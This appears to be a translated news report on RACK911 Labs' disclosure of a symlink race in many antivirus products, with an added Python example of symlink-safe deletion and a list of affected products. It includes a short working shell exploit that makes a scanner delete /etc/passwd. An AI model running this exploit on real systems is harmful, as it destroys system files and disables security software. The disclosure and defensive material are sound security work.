Researchers from RACK911 Labs
To carry out the attack, you need to place a file that the antivirus recognises as malicious (for example, the test signature can be used) and then, after the antivirus has detected the malicious file but immediately before the deletion routine is invoked, replace the directory containing the file with a symbolic link. On Windows the same effect is achieved by replacing the directory with a directory junction. The problem is that almost all antivirus products did not properly check for symbolic links and, believing they were deleting the malicious file, deleted the file in the directory the symbolic link points to.
For Linux and macOS it is shown how an unprivileged user can in this way delete /etc/passwd or any other system file, and on Windows the antivirus's own DLL library, blocking its operation (on Windows the attack is limited to deleting only files not currently in use by other applications). For example, an attacker can create an "exploit" directory and place in it an EpSecApiLib.dll file containing the test virus signature, then replace the "exploit" directory with a symbolic link to "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform" before the deletion, which leads to the EpSecApiLib.dll library being removed from the antivirus directory. On Linux and macOS a similar trick can be performed by replacing the directory with a symbolic link to "/etc".
#!/bin/sh
# Place the EICAR test file under the name of the system file to be targeted
rm -rf /home/user/exploit; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
# When the scanner opens the file, swap the directory for a symlink to /etc
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
rm -rf /home/user/exploit; ln -s /etc /home/user/exploit
done
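As an added illustration, and not code from the RACK911 Labs report, from opennet.ru or from any of the listed products, the following Python sketch shows the deletion routine a scanner needs instead of a plain path-based unlink: each directory component is opened relative to the previous one with O_NOFOLLOW and dir_fd, and the final unlink is issued against that directory descriptor, so the directory-to-symlink swap described above is refused rather than followed. The "exploit"/"victim" directory names, the file contents and the safe_unlink/demo function names are constructed for the demo; the example is POSIX-only (Windows junctions need a different check).

```python
import errno
import os
import shutil
import tempfile

# Refuse to traverse a symlink at any directory component; O_DIRECTORY also
# rejects a regular file planted where a directory is expected.
_DIR_FLAGS = os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY
# errno values for "O_NOFOLLOW hit a symlink" (Linux/macOS: ELOOP, some BSDs:
# EMLINK) and for a component that is not a directory.
_REFUSE = {errno.ELOOP, errno.EMLINK, errno.ENOTDIR}


def safe_unlink(base_dir: str, rel_path: str) -> bool:
    """Delete base_dir/rel_path without ever following a symlink.

    The descriptor pins the directory inode, so a directory swapped for a
    symlink between the scan and the delete yields ELOOP instead of reaching
    into the link target. Returns True if the file was removed, False if a
    symlink or non-directory component was refused.
    """
    parts = [p for p in rel_path.split("/") if p and p != "."]
    if not parts or ".." in parts:
        raise ValueError("rel_path must be non-empty and must not contain '..'")
    fd = os.open(base_dir, _DIR_FLAGS)
    try:
        for comp in parts[:-1]:
            try:
                nfd = os.open(comp, _DIR_FLAGS, dir_fd=fd)
            except OSError as exc:
                if exc.errno in _REFUSE:
                    return False
                raise
            os.close(fd)
            fd = nfd
        # unlink never follows the final component; dir_fd fixes the parent.
        os.unlink(parts[-1], dir_fd=fd)
        return True
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario: a directory holding a flagged file is swapped for
    a symlink to 'victim' between two deletes, mirroring the race above."""
    root = tempfile.mkdtemp(prefix="av-symlink-demo-")
    try:
        os.mkdir(os.path.join(root, "victim"))
        with open(os.path.join(root, "victim", "passwd"), "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")  # stand-in for /etc/passwd
        os.mkdir(os.path.join(root, "exploit"))
        with open(os.path.join(root, "exploit", "passwd"), "w") as fh:
            fh.write("flagged sample\n")  # stand-in for the EICAR file

        # 1. Honest case: the flagged file sits in a real directory.
        removed_real = safe_unlink(root, "exploit/passwd")

        # 2. The directory is replaced by a symlink before the next delete.
        os.rmdir(os.path.join(root, "exploit"))
        os.symlink(os.path.join(root, "victim"), os.path.join(root, "exploit"))
        refused = not safe_unlink(root, "exploit/passwd")
        victim_after_safe = os.path.exists(os.path.join(root, "victim", "passwd"))

        # 3. Naive path-based delete: the behaviour the affected scanners had.
        os.remove(os.path.join(root, "exploit", "passwd"))
        victim_after_naive = os.path.exists(os.path.join(root, "victim", "passwd"))

        return {
            "removed_real": removed_real,
            "refused_symlink": refused,
            "victim_intact_after_safe": victim_after_safe,
            "victim_intact_after_naive": victim_after_naive,
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The key design point is that the check and the use are the same system call: opening the component with O_NOFOLLOW either yields a descriptor to the real directory or fails, and everything after that is relative to the descriptor rather than to a path that can be re-resolved. An lstat() followed by a path-based unlink would leave exactly the window the script above exploits.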
In addition, many antivirus programs for Linux and macOS were found to use predictable file names when working with temporary files in the /tmp and /private/tmp directories, which could be used to escalate privileges to the root user.
The problems have now been fixed by most vendors, but it is notable that the first notifications about the issue were sent to the manufacturers in autumn 2018. Although not all vendors have released updates, they were given at least 6 months to patch, and RACK911 Labs believes it is now free to disclose the vulnerabilities. It is noted that RACK911 Labs has been identifying vulnerabilities for a long time, but did not expect that working with colleagues from the antivirus industry would be so difficult because of delays in releasing updates and disregard for the need to fix security problems promptly.
Affected products (the free antivirus package ClamAV is not on the list):
- Linux
  - BitDefender GravityZone
  - Comodo Endpoint Security
  - Eset File Server Security
  - F-Secure Linux Security
  - Kaspersky Endpoint Security
  - McAfee Endpoint Security
  - Sophos Anti-Virus for Linux
- Windows
  - Avast Free Anti-Virus
  - Avira Free Anti-Virus
  - BitDefender GravityZone
  - Comodo Endpoint Security
  - F-Secure Computer Protection
  - FireEye Endpoint Security
  - Intercept X (Sophos)
  - Kaspersky Endpoint Security
  - Malwarebytes for Windows
  - McAfee Endpoint Security
  - Panda Dome
  - Webroot Secure Anywhere
- macOS
  - AVG
  - BitDefender Total Security
  - Eset Cyber Security
  - Kaspersky Internet Security
  - McAfee Total Protection
  - Microsoft Defender (BETA)
  - Norton Security
  - Sophos Home
  - Webroot Secure Anywhere
Source: opennet.ru